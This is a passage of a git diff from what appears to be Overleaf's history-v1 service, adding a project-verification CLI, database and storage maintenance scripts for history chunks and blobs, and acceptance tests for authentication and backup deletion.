'writeMetrics', type: Boolean, defaultValue: false }, + { name: 'strategy', type: String, defaultValue: 'range' }, + ]) + + if (usage) { + console.log(usageMessage) + process.exit(0) + } + + if (!['range', 'random', 'recent'].includes(strategy)) { + throw new Error(`Invalid strategy: ${strategy}`) + } + + setWriteMetrics(writeMetrics) + + switch (strategy) { + case 'random': + console.log('Verifying random projects') + return { + verbose, + projectVerifier: signal => verifyRandomProjectSample(nProjects, signal), + } + case 'recent': + return { + verbose, + projectVerifier: async signal => { + const { startDate, endDate } = getDatesBeforeRPO(3 * 3600) + return await verifyProjectsUpdatedInDateRange( + startDate, + endDate, + nProjects, + signal + ) + }, + } + case 'range': + default: { + if (!startDate || !endDate) { + throw new Error(usageMessage) + } + const start = Date.parse(startDate) + const end = Date.parse(endDate) + if (Number.isNaN(start)) { + throw new Error(`Invalid start date: ${startDate}`) + } + + if (Number.isNaN(end)) { + throw new Error(`Invalid end date: ${endDate}`) + } + if (verbose) { + console.log(`Verifying from ${startDate} to ${endDate}`) + console.log(`Concurrency: ${concurrency}`) + } + STATS.ranges = 0 + return { + projectVerifier: signal => + verifyProjectsCreatedInDateRange({ + startDate: new Date(start), + endDate: new Date(end), + projectsPerRange: nProjects, + concurrency, + signal, + }), + verbose, + } + } + } +} + +/** + * @type {CLIOptions} + */ +let options +try { + options = getOptions() +} catch (error) { + console.error(error) + process.exitCode = 1 + await gracefulShutdown(1) + process.exit() // just here so the type checker knows that the process will exit +} + +const { projectVerifier, verbose } = options + +if (verbose) { + logger.logger.level('debug') +} + +/** + * + * @param {Array<string>} array + * @param {string} matchString + * @return {*} + */ +function sumStringInstances(array, matchString) { + return array.reduce((total, string) => { + return string === matchString ? total + 1 : total + }, 0) +} + +/** + * + * @param {VerificationJobStatus} stats + */ +function displayStats(stats) { + console.log(`Verified projects: ${stats.verified}`) + console.log(`Total projects sampled: ${stats.total}`) + if (stats.errorTypes.length > 0) { + console.log('Errors:') + for (const error of new Set(stats.errorTypes)) { + console.log(`${error}: ${sumStringInstances(stats.errorTypes, error)}`) + } + } +} + +const shutdownEmitter = new EventEmitter() + +shutdownEmitter.on('shutdown', async () => { + await gracefulShutdown() +}) + +process.on('SIGTERM', () => { + shutdownEmitter.emit('shutdown') +}) + +process.on('SIGINT', () => { + shutdownEmitter.emit('shutdown') +}) + +await loadGlobalBlobs() + +try { + const stats = await projectVerifier(shutdownEmitter) + displayStats(stats) + console.log(`completed`) +} catch (error) { + console.error(error) + console.log('completed with errors') + process.exitCode = 1 +} finally { + console.log('shutting down') + await gracefulShutdown() +} diff --git a/services/history-v1/storage/tasks/backfill_start_version.js b/services/history-v1/storage/tasks/backfill_start_version.js new file mode 100644 index 0000000..fd6d624 --- /dev/null +++ b/services/history-v1/storage/tasks/backfill_start_version.js @@ -0,0 +1,109 @@ +const commandLineArgs = require('command-line-args') +const BPromise = require('bluebird') +const timersPromises = require('node:timers/promises') + +const { knex, historyStore } = require('..') + +const MAX_POSTGRES_INTEGER = 2147483647 +const DEFAULT_BATCH_SIZE = 1000 +const DEFAULT_CONCURRENCY = 1 +const MAX_RETRIES = 10 +const RETRY_DELAY_MS = 5000 + +async function main() { + const options = parseOptions() + let batchStart = options.minId + while (batchStart <= options.maxId) { + const chunks = await getChunks(batchStart, options.maxId, options.batchSize) + if (chunks.length === 0) { + // No results. We're done. + break + } + const batchEnd = chunks[chunks.length - 1].id + await processBatch(chunks, options) + console.log(`Processed chunks ${batchStart} to ${batchEnd}`) + batchStart = batchEnd + 1 + } +} + +function parseOptions() { + const args = commandLineArgs([ + { name: 'min-id', type: Number, defaultValue: 1 }, + { + name: 'max-id', + type: Number, + defaultValue: MAX_POSTGRES_INTEGER, + }, + { name: 'batch-size', type: Number, defaultValue: DEFAULT_BATCH_SIZE }, + { name: 'concurrency', type: Number, defaultValue: DEFAULT_CONCURRENCY }, + ]) + return { + minId: args['min-id'], + maxId: args['max-id'], + batchSize: args['batch-size'], + concurrency: args.concurrency, + } +} + +async function getChunks(minId, maxId, batchSize) { + const chunks = await knex('chunks') + .where('id', '>=', minId) + .andWhere('id', '<=', maxId) + .orderBy('id') + .limit(batchSize) + return chunks +} + +async function processBatch(chunks, options) { + let retries = 0 + while (true) { + const results = await BPromise.map(chunks, processChunk, { + concurrency: options.concurrency, + }) + const failedChunks = results + .filter(result => !result.success) + .map(result => result.chunk) + if (failedChunks.length === 0) { + // All chunks processed. Carry on. + break + } + + // Some projects failed. Retry. + retries += 1 + if (retries > MAX_RETRIES) { + console.log('Too many retries processing chunks. Giving up.') + process.exit(1) + } + console.log( + `Retrying chunks: ${failedChunks.map(chunk => chunk.id).join(', ')}` + ) + await timersPromises.setTimeout(RETRY_DELAY_MS) + chunks = failedChunks + } +} + +async function processChunk(chunk) { + try { + const rawHistory = await historyStore.loadRaw( + chunk.doc_id.toString(), + chunk.id + ) + const startVersion = chunk.end_version - rawHistory.changes.length + await knex('chunks') + .where('id', chunk.id) + .update({ start_version: startVersion }) + return { chunk, success: true } + } catch (err) { + console.error(`Failed to process chunk ${chunk.id}:`, err.stack) + return { chunk, success: false } + } +} + +main() + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/tasks/compress_changes.js b/services/history-v1/storage/tasks/compress_changes.js new file mode 100644 index 0000000..9ae7ade --- /dev/null +++ b/services/history-v1/storage/tasks/compress_changes.js @@ -0,0 +1,107 @@ +/** + * Compress changes for projects that have too many text operations. + * + * Usage: + * + * node tasks/compress_changes.js CSV_FILE + * + * where CSV_FILE contains a list of project ids in the first column + */ + +const fs = require('node:fs') +const BPromise = require('bluebird') +const { History } = require('overleaf-editor-core') +const { historyStore, chunkStore } = require('..') + +const CONCURRENCY = 10 + +async function main() { + const filename = process.argv[2] + const projectIds = await readCsv(filename) + const chunks = [] + for (const projectId of projectIds) { + const chunkIds = await chunkStore.getProjectChunkIds(projectId) + chunks.push(...chunkIds.map(id => ({ id, projectId }))) + } + let totalCompressed = 0 + await BPromise.map( + chunks, + async chunk => { + try { + const history = await getHistory(chunk) + const numCompressed = compressChanges(history) + if (numCompressed > 0) { + await storeHistory(chunk, history) + console.log( + `Compressed project ${chunk.projectId}, chunk ${chunk.id}` + ) + } + totalCompressed += numCompressed + } catch (err) { + console.log(err) + } + }, + { concurrency: CONCURRENCY } + ) + console.log('CHANGES:', totalCompressed) +} + +async function readCsv(filename) { + const csv = await fs.promises.readFile(filename, 'utf-8') + const lines = csv.trim().split('\n') + const projectIds = lines.map(line => line.split(',')[0]) + return projectIds +} + +async function getHistory(chunk) { + const rawHistory = await historyStore.loadRaw(chunk.projectId, chunk.id) + const history = History.fromRaw(rawHistory) + return history +} + +async function storeHistory(chunk, history) { + const rawHistory = history.toRaw() + await historyStore.storeRaw(chunk.projectId, chunk.id, rawHistory) +} + +function compressChanges(history) { + let numCompressed = 0 + for (const change of history.getChanges()) { + const newOperations = compressOperations(change.operations) + if (newOperations.length !== change.operations.length) { + numCompressed++ + } + change.setOperations(newOperations) + } + return numCompressed +} + +function compressOperations(operations) { + if (!operations.length) return [] + + const newOperations = [] + let currentOperation = operations[0] + for (let operationId = 1; operationId < operations.length; operationId++) { + const nextOperation = operations[operationId] + if (currentOperation.canBeComposedWith(nextOperation)) { + currentOperation = currentOperation.compose(nextOperation) + } else { + // currentOperation and nextOperation cannot be composed. Push the + // currentOperation and start over with nextOperation. + newOperations.push(currentOperation) + currentOperation = nextOperation + } + } + newOperations.push(currentOperation) + + return newOperations +} + +main() + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/tasks/copy_project_blobs.js b/services/history-v1/storage/tasks/copy_project_blobs.js new file mode 100755 index 0000000..c3511bf --- /dev/null +++ b/services/history-v1/storage/tasks/copy_project_blobs.js @@ -0,0 +1,294 @@ +#!/usr/bin/env node + +const { promisify } = require('node:util') +const BPromise = require('bluebird') +const commandLineArgs = require('command-line-args') +const config = require('config') +const fs = require('node:fs') +const readline = require('node:readline') +const { History } = require('overleaf-editor-core') +const { knex, historyStore, persistor } = require('..') +const projectKey = require('../lib/project_key') + +const MAX_POSTGRES_INTEGER = 2147483647 +const DEFAULT_BATCH_SIZE = 1000 +const MAX_RETRIES = 10 +const RETRY_DELAY_MS = 5000 + +// Obtain a preconfigured GCS client through a non-documented property of +// object-persistor. Sorry about that. We need the GCS client because we use +// operations that are not implemented in object-persistor. +const gcsClient = persistor.storage +const globalBucket = gcsClient.bucket(config.get('blobStore.globalBucket')) +const projectBucket = gcsClient.bucket(config.get('blobStore.projectBucket')) +const delay = promisify(setTimeout) + +async function main() { + const options = commandLineArgs([ + { name: 'global-blobs', type: String }, + { name: 'min-project-id', type: Number, defaultValue: 1 }, + { + name: 'max-project-id', + type: Number, + defaultValue: MAX_POSTGRES_INTEGER, + }, + { name: 'batch-size', type: Number, defaultValue: DEFAULT_BATCH_SIZE }, + { name: 'concurrency', type: Number, defaultValue: 1 }, + ]) + if (!options['global-blobs']) { + console.error( + 'You must specify a global blobs file with the --global-blobs option' + ) + process.exit(1) + } + const globalBlobs = await readGlobalBlobs(options['global-blobs']) + const minProjectId = options['min-project-id'] + const maxProjectId = options['max-project-id'] + const batchSize = options['batch-size'] + const concurrency = options.concurrency + console.log(`Keeping ${globalBlobs.size} global blobs`) + await run({ globalBlobs, minProjectId, maxProjectId, batchSize, concurrency }) + console.log('Done.') +} + +async function readGlobalBlobs(filename) { + const stream = fs.createReadStream(filename) + const reader = readline.createInterface({ + input: stream, + crlfDelay: Infinity, + }) + const blobs = new Set() + for await (const line of reader) { + blobs.add(line.trim()) + } + return blobs +} + +async function run(options) { + const { globalBlobs, minProjectId, maxProjectId, batchSize, concurrency } = + options + let batchStart = minProjectId + while (batchStart <= maxProjectId) { + let projectIds = await getProjectIds(batchStart, maxProjectId, batchSize) + if (projectIds.length === 0) { + break + } + const batchEnd = projectIds[projectIds.length - 1] + console.log(`Processing projects ${batchStart} to ${batchEnd}`) + const chunkIdsByProject = await getChunkIdsByProject(projectIds) + + let retries = 0 + while (true) { + const results = await BPromise.map( + projectIds, + async projectId => + await processProject( + projectId, + chunkIdsByProject.get(projectId), + globalBlobs + ), + { concurrency } + ) + const failedProjectIds = results + .filter(result => !result.success) + .map(result => result.projectId) + if (failedProjectIds.length === 0) { + // All projects were copied successfully. Carry on. + break + } + + // Some projects failed. Retry. + retries += 1 + if (retries > MAX_RETRIES) { + console.log( + `Too many retries processing projects ${batchStart} to ${batchEnd}. Giving up.` + ) + process.exit(1) + } + console.log(`Retrying projects: ${failedProjectIds.join(', ')}`) + await delay(RETRY_DELAY_MS) + projectIds = failedProjectIds + } + + // Set up next batch + batchStart = batchEnd + 1 + } +} + +async function getProjectIds(minProjectId, maxProjectId, batchSize) { + const projectIds = await knex('chunks') + .distinct('doc_id') + .where('doc_id', '>=', minProjectId) + .andWhere('doc_id', '<=', maxProjectId) + .orderBy('doc_id') + .limit(batchSize) + .pluck('doc_id') + return projectIds +} + +async function getChunkIdsByProject(projectIds) { + const chunks = await knex('chunks') + .select('id', { projectId: 'doc_id' }) + .where('doc_id', 'in', projectIds) + const chunkIdsByProject = new Map() + for (const projectId of projectIds) { + chunkIdsByProject.set(projectId, []) + } + for (const chunk of chunks) { + chunkIdsByProject.get(chunk.projectId).push(chunk.id) + } + return chunkIdsByProject +} + +async function processProject(projectId, chunkIds, globalBlobs) { + try { + const blobHashes = await getBlobHashes(projectId, chunkIds) + const projectBlobHashes = blobHashes.filter(hash => !globalBlobs.has(hash)) + const gcsSizesByHash = new Map() + for (const blobHash of projectBlobHashes) { + const blobSize = await copyBlobInGcs(projectId, blobHash) + if (blobSize != null) { + gcsSizesByHash.set(blobHash, blobSize) + } + } + const dbSizesByHash = await copyBlobsInDatabase( + projectId, + projectBlobHashes + ) + compareBlobSizes(gcsSizesByHash, dbSizesByHash) + return { projectId, success: true } + } catch (err) { + console.error(`Failed to process project ${projectId}:`, err.stack) + return { projectId, success: false } + } +} + +function compareBlobSizes(gcsSizesByHash, dbSizesByHash) { + // Throw an error if the database doesn't report as many blobs as GCS + if (dbSizesByHash.size !== gcsSizesByHash.size) { + throw new Error( + `the database reported ${dbSizesByHash.size} blobs copied, but GCS reported ${gcsSizesByHash.size} blobs copied` + ) + } + + const mismatches = [] + for (const [hash, dbSize] of dbSizesByHash.entries()) { + if (gcsSizesByHash.get(hash) !== dbSize) { + mismatches.push(hash) + } + } + if (mismatches.length > 0) { + throw new Error(`blob size mismatch for hashes: ${mismatches.join(', ')}`) + } +} + +async function getHistory(projectId, chunkId) { + const rawHistory = await historyStore.loadRaw(projectId, chunkId) + const history = History.fromRaw(rawHistory) + return history +} + +async function getBlobHashes(projectId, chunkIds) { + const blobHashes = new Set() + for (const chunkId of chunkIds) { + const history = await getHistory(projectId, chunkId) + history.findBlobHashes(blobHashes) + } + return Array.from(blobHashes) +} + +async function copyBlobInGcs(projectId, blobHash) { + const globalBlobKey = [ + blobHash.slice(0, 2), + blobHash.slice(2, 4), + blobHash.slice(4), + ].join('/') + const projectBlobKey = [ + projectKey.format(projectId), + blobHash.slice(0, 2), + blobHash.slice(2), + ].join('/') + const globalBlobObject = globalBucket.file(globalBlobKey) + const projectBlobObject = projectBucket.file(projectBlobKey) + + // Check if the project blob exists + let projectBlobMetadata = null + try { + ;[projectBlobMetadata] = await projectBlobObject.getMetadata() + } catch (err) { + if (err.code !== 404) { + throw err + } + } + + // Check that the blob exists + let globalBlobMetadata = null + try { + ;[globalBlobMetadata] = await globalBlobObject.getMetadata() + } catch (err) { + if (err.code !== 404) { + throw err + } + } + + if (projectBlobMetadata) { + // Project blob already exists. Compare the metadata if the global blob + // also exists and return early. + if ( + globalBlobMetadata != null && + (globalBlobMetadata.size !== projectBlobMetadata.size || + globalBlobMetadata.md5Hash !== projectBlobMetadata.md5Hash) + ) { + throw new Error( + `Project blob ${blobHash} in project ${projectId} doesn't match global blob` + ) + } + return null + } + + await globalBlobObject.copy(projectBlobObject) + + // Paranoid check that the copy went well. The getMetadata() method returns + // an array, with the metadata in first position. + ;[projectBlobMetadata] = await projectBlobObject.getMetadata() + if ( + globalBlobMetadata.size !== projectBlobMetadata.size || + globalBlobMetadata.md5Hash !== projectBlobMetadata.md5Hash + ) { + throw new Error(`Failed to copy blob ${blobHash} to project ${projectId})`) + } + + return parseInt(projectBlobMetadata.size, 10) +} + +async function copyBlobsInDatabase(projectId, blobHashes) { + const blobSizesByHash = new Map() + if (blobHashes.length === 0) { + return blobSizesByHash + } + const binaryBlobHashes = blobHashes.map(hash => Buffer.from(hash, 'hex')) + const result = await knex.raw( + `INSERT INTO project_blobs ( + project_id, hash_bytes, byte_length, string_length + ) + SELECT ?, hash_bytes, byte_length, string_length + FROM blobs + WHERE hash_bytes IN (${binaryBlobHashes.map(_ => '?').join(',')}) + ON CONFLICT (project_id, hash_bytes) DO NOTHING + RETURNING hash_bytes, byte_length`, + [projectId, ...binaryBlobHashes] + ) + for (const row of result.rows) { + blobSizesByHash.set(row.hash_bytes.toString('hex'), row.byte_length) + } + return blobSizesByHash +} + +main() + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/tasks/delete_old_chunks.js b/services/history-v1/storage/tasks/delete_old_chunks.js new file mode 100644 index 0000000..e120111 --- /dev/null +++ b/services/history-v1/storage/tasks/delete_old_chunks.js @@ -0,0 +1,36 @@ +#!/usr/bin/env node + +'use strict' + +const commandLineArgs = require('command-line-args') +const { chunkStore } = require('../') + +async function deleteOldChunks(options) { + const deletedChunksTotal = await chunkStore.deleteOldChunks(options) + console.log(`Deleted ${deletedChunksTotal} old chunks`) +} + +exports.deleteOldChunks = deleteOldChunks + +if (require.main === module) { + const options = commandLineArgs([ + { name: 'batch-size', type: Number }, + { name: 'max-batches', type: Number }, + { name: 'min-age', type: Number }, + { name: 'timeout', type: Number }, + { name: 'verbose', type: Boolean, alias: 'v', defaultValue: false }, + ]) + deleteOldChunks({ + batchSize: options['batch-size'], + maxBatches: options['max-batches'], + timeout: options.timeout, + minAgeSecs: options['min-age'], + }) + .then(() => { + process.exit() + }) + .catch(err => { + console.error(err) + process.exit(1) + }) +} diff --git a/services/history-v1/storage/tasks/fix_duplicate_versions.js b/services/history-v1/storage/tasks/fix_duplicate_versions.js new file mode 100755 index 0000000..a7db4b2 --- /dev/null +++ b/services/history-v1/storage/tasks/fix_duplicate_versions.js @@ -0,0 +1,156 @@ +#!/usr/bin/env node + +'use strict' + +const commandLineArgs = require('command-line-args') +const { chunkStore } = require('..') + +main() + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) + +async function main() { + const opts = commandLineArgs([ + { name: 'project-ids', type: String, multiple: true, defaultOption: true }, + { name: 'save', type: Boolean, defaultValue: false }, + { name: 'help', type: Boolean, defaultValue: false }, + ]) + if (opts.help || opts['project-ids'] == null) { + console.log('Usage: fix_duplicate_versions [--save] PROJECT_ID...') + process.exit() + } + for (const projectId of opts['project-ids']) { + await processProject(projectId, opts.save) + } + if (!opts.save) { + console.log('\nThis was a dry run. Re-run with --save to persist changes.') + } +} + +async function processProject(projectId, save) { + console.log(`Project ${projectId}:`) + const chunk = await chunkStore.loadLatest(projectId) + let numChanges = 0 + numChanges += removeDuplicateProjectVersions(chunk) + numChanges += removeDuplicateDocVersions(chunk) + console.log(` ${numChanges > 0 ? numChanges : 'no'} changes`) + if (save && numChanges > 0) { + await replaceChunk(projectId, chunk) + } +} + +function removeDuplicateProjectVersions(chunk) { + let numChanges = 0 + let lastVersion = null + const { snapshot, changes } = chunk.history + if (snapshot.projectVersion != null) { + lastVersion = snapshot.projectVersion + } + for (const change of changes) { + if (change.projectVersion == null) { + // Not a project structure change. Ignore. + continue + } + if ( + lastVersion != null && + !areProjectVersionsIncreasing(lastVersion, change.projectVersion) + ) { + // Duplicate. Remove all ops + console.log( + ` Removing out-of-order project structure change: ${change.projectVersion} <= ${lastVersion}` + ) + change.setOperations([]) + delete change.projectVersion + numChanges++ + } else { + lastVersion = change.projectVersion + } + } + + return numChanges +} + +function removeDuplicateDocVersions(chunk) { + let numChanges = 0 + const lastVersions = new Map() + const { snapshot, changes } = chunk.history + if (snapshot.v2DocVersions != null) { + for (const { pathname, v } of Object.values(snapshot.v2DocVersions.data)) { + lastVersions.set(pathname, v) + } + } + for (const change of changes) { + if (change.v2DocVersions == null) { + continue + } + + // Collect all docs that have problematic versions + const badPaths = [] + const badDocIds = [] + for (const [docId, { pathname, v }] of Object.entries( + change.v2DocVersions.data + )) { + const lastVersion = lastVersions.get(docId) + if (lastVersion != null && v <= lastVersion) { + // Duplicate. Remove ops related to that doc + console.log( + ` Removing out-of-order change for doc ${docId} (${pathname}): ${v} <= ${lastVersion}` + ) + badPaths.push(pathname) + badDocIds.push(docId) + numChanges++ + } else { + lastVersions.set(docId, v) + } + } + + // Remove bad operations + if (badPaths.length > 0) { + change.setOperations( + change.operations.filter( + op => op.pathname == null || !badPaths.includes(op.pathname) + ) + ) + } + + // Remove bad v2 doc versions + for (const docId of badDocIds) { + delete change.v2DocVersions.data[docId] + } + } + + return numChanges +} + +function areProjectVersionsIncreasing(v1Str, v2Str) { + const v1 = parseProjectVersion(v1Str) + const v2 = parseProjectVersion(v2Str) + return v2.major > v1.major || (v2.major === v1.major && v2.minor > v1.minor) +} + +function parseProjectVersion(version) { + const [major, minor] = version.split('.').map(x => parseInt(x, 10)) + if (isNaN(major) || isNaN(minor)) { + throw new Error(`Invalid project version: ${version}`) + } + return { major, minor } +} + +async function replaceChunk(projectId, chunk) { + const endVersion = chunk.getEndVersion() + const oldChunkId = await chunkStore.getChunkIdForVersion( + projectId, + endVersion + ) + console.log(` Replacing chunk ${oldChunkId}`) + // The chunks table has a unique constraint on doc_id and end_version. Because + // we're replacing a chunk with the same end version, we need to destroy the + // chunk first. + await chunkStore.destroy(projectId, oldChunkId) + await chunkStore.create(projectId, chunk) +} diff --git a/services/history-v1/storage/tasks/index.js b/services/history-v1/storage/tasks/index.js new file mode 100644 index 0000000..65bed63 --- /dev/null +++ b/services/history-v1/storage/tasks/index.js @@ -0,0 +1 @@ +exports.deleteOldChunks = require('./delete_old_chunks').deleteOldChunks diff --git a/services/history-v1/test/acceptance/certs/.gitignore b/services/history-v1/test/acceptance/certs/.gitignore new file mode 100644 index 0000000..d6b7ef3 --- /dev/null +++ b/services/history-v1/test/acceptance/certs/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore diff --git a/services/history-v1/test/acceptance/js/api/auth.test.js b/services/history-v1/test/acceptance/js/api/auth.test.js new file mode 100644 index 0000000..65c9219 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/auth.test.js @@ -0,0 +1,195 @@ +const config = require('config') +const fetch = require('node-fetch') +const sinon = require('sinon') +const { expect } = require('chai') + +const cleanup = require('../storage/support/cleanup') +const expectResponse = require('./support/expect_response') +const fixtures = require('../storage/support/fixtures') +const HTTPStatus = require('http-status') +const testServer = require('./support/test_server') + +describe('auth', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + beforeEach('Set up stubs', function () { + sinon.stub(config, 'has').callThrough() + sinon.stub(config, 'get').callThrough() + }) + afterEach(sinon.restore) + + it('renders 401 on swagger docs endpoint without auth', async function () { + const response = await fetch(testServer.url('/docs')) + expect(response.status).to.equal(HTTPStatus.UNAUTHORIZED) + expect(response.headers.get('www-authenticate')).to.match(/^Basic/) + }) + + it('renders swagger docs endpoint with auth', async function () { + const response = await fetch(testServer.url('/docs'), { + headers: { + Authorization: testServer.basicAuthHeader, + }, + }) + expect(response.ok).to.be.true + }) + + it('takes an old basic auth password during a password change', async function () { + setMockConfig('basicHttpAuth.oldPassword', 'foo') + + // Primary should still work. + const response1 = await fetch(testServer.url('/docs'), { + headers: { + Authorization: testServer.basicAuthHeader, + }, + }) + expect(response1.ok).to.be.true + + // Old password should also work. + const response2 = await fetch(testServer.url('/docs'), { + headers: { + Authorization: 'Basic ' + Buffer.from('staging:foo').toString('base64'), + }, + }) + expect(response2.ok).to.be.true + + // Incorrect password should not work. + const response3 = await fetch(testServer.url('/docs'), { + header: { + Authorization: 'Basic ' + Buffer.from('staging:bar').toString('base64'), + }, + }) + expect(response3.status).to.equal(HTTPStatus.UNAUTHORIZED) + }) + + it('renders 401 on ProjectImport endpoints', async function () { + const unauthenticatedClient = testServer.client + try { + await unauthenticatedClient.apis.ProjectImport.importSnapshot1({ + project_id: '1', + snapshot: { files: {} }, + }) + expect.fail() + } catch (err) { + expectResponse.unauthorized(err) + expect(err.response.headers['www-authenticate']).to.match(/^Basic/) + } + + // check that the snapshot was not persisted even if the response was a 401 + const projectClient = await testServer.createClientForProject('1') + try { + await projectClient.apis.Project.getLatestHistory({ project_id: '1' }) + expect.fail() + } catch (err) { + expectResponse.notFound(err) + } + }) + + it('renders 401 for JWT endpoints', function () { + return testServer.client.apis.Project.getLatestHistory({ + project_id: '10000', + }) + .then(() => { + expect.fail() + }) + .catch(err => { + expectResponse.unauthorized(err) + expect(err.response.headers['www-authenticate']).to.equal('Bearer') + }) + }) + + it('accepts basic auth in place of JWT (for now)', function () { + const projectId = fixtures.docs.initializedProject.id + return testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistory({ + project_id: projectId, + }).then(response => { + expect(response.obj.chunk).to.exist + }) + }) + + it('uses JWT', function () { + const projectId = fixtures.docs.initializedProject.id + return testServer + .createClientForProject(projectId) + .then(client => { + return client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + }) + .then(response => { + expect(response.obj.chunk).to.exist + }) + }) + + it('checks for project id', function () { + return testServer + .createClientForProject('1') + .then(client => { + return client.apis.Project.getLatestHistory({ + project_id: '2', + }) + }) + .then(() => { + expect.fail() + }) + .catch(expectResponse.forbidden) + }) + + it('does not accept jwt for ProjectUpdate endpoints', function () { + return testServer.createClientForProject('1').then(client => { + return client.apis.ProjectImport.importSnapshot1({ + project_id: '1', + snapshot: {}, + }) + .then(() => { + expect.fail() + }) + .catch(expectResponse.unauthorized) + }) + }) + + describe('when an old JWT key is defined', function () { + beforeEach(function () { + setMockConfig('jwtAuth.oldKey', 'old-secret') + }) + + it('accepts the old key', async function () { + const projectId = fixtures.docs.initializedProject.id + const client = await testServer.createClientForProject(projectId, { + jwtKey: 'old-secret', + }) + const response = await client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + expect(response.obj.chunk).to.exist + }) + + it('accepts the new key', async function () { + const projectId = fixtures.docs.initializedProject.id + const client = await testServer.createClientForProject(projectId) + const response = await client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + expect(response.obj.chunk).to.exist + }) + + it('rejects other keys', async function () { + const projectId = fixtures.docs.initializedProject.id + const client = await testServer.createClientForProject(projectId, { + jwtKey: 'bad-secret', + }) + try { + await client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + expect.fail() + } catch (err) { + expectResponse.unauthorized(err) + } + }) + }) +}) + +function setMockConfig(path, value) { + config.has.withArgs(path).returns(true) + config.get.withArgs(path).returns(value) +} diff --git a/services/history-v1/test/acceptance/js/api/backupDeletion.test.mjs b/services/history-v1/test/acceptance/js/api/backupDeletion.test.mjs new file mode 100644 index 0000000..46512d1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/backupDeletion.test.mjs @@ -0,0 +1,244 @@ +// @ts-check +import cleanup from '../storage/support/cleanup.js' +import fetch from 'node-fetch' +import testServer from './support/test_backup_deletion_server.mjs' +import { expect } from 'chai' +import testProjects from './support/test_projects.js' +import { db } from '../../../../storage/lib/mongodb.js' +import { ObjectId } from 'mongodb' +import { + backupPersistor, + projectBlobsBucket, + chunksBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { makeProjectKey } from '../../../../storage/lib/blob_store/index.js' +import config from 'config' +import Stream from 'stream' +import projectKey from '../../../../storage/lib/project_key.js' + +/** + * @typedef {import("node-fetch").Response} Response + */ + +const { deksBucket } = config.get('backupStore') + +const deletedProjectsCollection = db.collection('deletedProjects') + +/** + * @param {string} bucket + * @param {string} prefix + * @return {Promise<Array<string>>} + */ +async function listS3Bucket(bucket, prefix) { + // @ts-ignore access to internal library helper + const client = backupPersistor._getClientForBucket(bucket) + const response = await client + .listObjectsV2({ Bucket: bucket, Prefix: prefix }) + .promise() + return (response.Contents || []).map(item => item.Key || '') +} + +/** + * @param {ObjectId} projectId + * @return {Promise<Response>} + */ +async function deleteProject(projectId) { + return await fetch(testServer.testUrl(`/project/${projectId}/backup`), { + method: 'DELETE', + headers: { Authorization: testServer.basicAuthHeader }, + }) +} + +/** + * @param {number|ObjectId} historyId + * @return {Promise<void>} + */ +async function expectToHaveBackup(historyId) { + const prefix = projectKey.format(historyId.toString()) + '/' + expect(await listS3Bucket(deksBucket, prefix)).to.have.length(1) + expect(await listS3Bucket(chunksBucket, prefix)).to.have.length(2) + expect(await listS3Bucket(projectBlobsBucket, prefix)).to.have.length(2) +} + +/** + * @param {number|ObjectId} historyId + * @return {Promise<void>} + */ +async function expectToHaveNoBackup(historyId) { + const prefix = projectKey.format(historyId.toString()) + '/' + expect(await listS3Bucket(deksBucket, prefix)).to.have.length(0) + expect(await listS3Bucket(chunksBucket, prefix)).to.have.length(0) + expect(await listS3Bucket(projectBlobsBucket, prefix)).to.have.length(0) +} + +describe('backupDeletion', function () { + beforeEach(cleanup.everything) + beforeEach('create health check projects', async function () { + await testProjects.createEmptyProject('42') + await testProjects.createEmptyProject('000000000000000000000042') + }) + beforeEach(testServer.listenOnRandomPort) + + it('renders 200 on /status', async function () { + const response = await fetch(testServer.testUrl('/status')) + expect(response.status).to.equal(200) + }) + + it('renders 200 on /health_check', async function () { + const response = await fetch(testServer.testUrl('/health_check')) + expect(response.status).to.equal(200) + }) + + describe('DELETE /project/:projectId', function () { + const postgresHistoryId = 1 + const projectIdPostgres = new ObjectId('000000000000000000000001') + const projectIdMongoDB = new ObjectId('000000000000000000000002') + const projectIdNonDeleted = new ObjectId('000000000000000000000003') + const projectIdNonExpired = new ObjectId('000000000000000000000004') + const projectIdWithChunks = new ObjectId('000000000000000000000005') + const projectIdNoHistoryId = new ObjectId('000000000000000000000006') + + beforeEach('populate mongo', async function () { + await deletedProjectsCollection.insertMany([ + { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectIdPostgres, + deletedAt: new Date('2024-01-01T00:00:00Z'), + deletedProjectOverleafHistoryId: postgresHistoryId, + }, + }, + { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectIdNonExpired, + deletedAt: new Date(), + deletedProjectOverleafHistoryId: projectIdNonExpired.toString(), + }, + }, + { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectIdNoHistoryId, + deletedAt: new Date('2024-01-01T00:00:00Z'), + }, + }, + ...[projectIdMongoDB, projectIdWithChunks].map(projectId => { + return { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectId, + deletedAt: new Date('2024-01-01T00:00:00Z'), + deletedProjectOverleafHistoryId: projectId.toString(), + }, + } + }), + ]) + }) + + beforeEach('initialize history', async function () { + await testProjects.createEmptyProject(projectIdWithChunks.toString()) + }) + + beforeEach('create a file in s3', async function () { + const historyIds = [ + postgresHistoryId, + projectIdMongoDB, + projectIdNonDeleted, + projectIdNonExpired, + projectIdWithChunks, + projectIdNoHistoryId, + ] + const jobs = [] + for (const historyId of historyIds) { + jobs.push( + backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId, 'a'.repeat(40)), + Stream.Readable.from(['blob a']), + { contentLength: 6 } + ) + ) + jobs.push( + backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId, 'b'.repeat(40)), + Stream.Readable.from(['blob b']), + { contentLength: 6 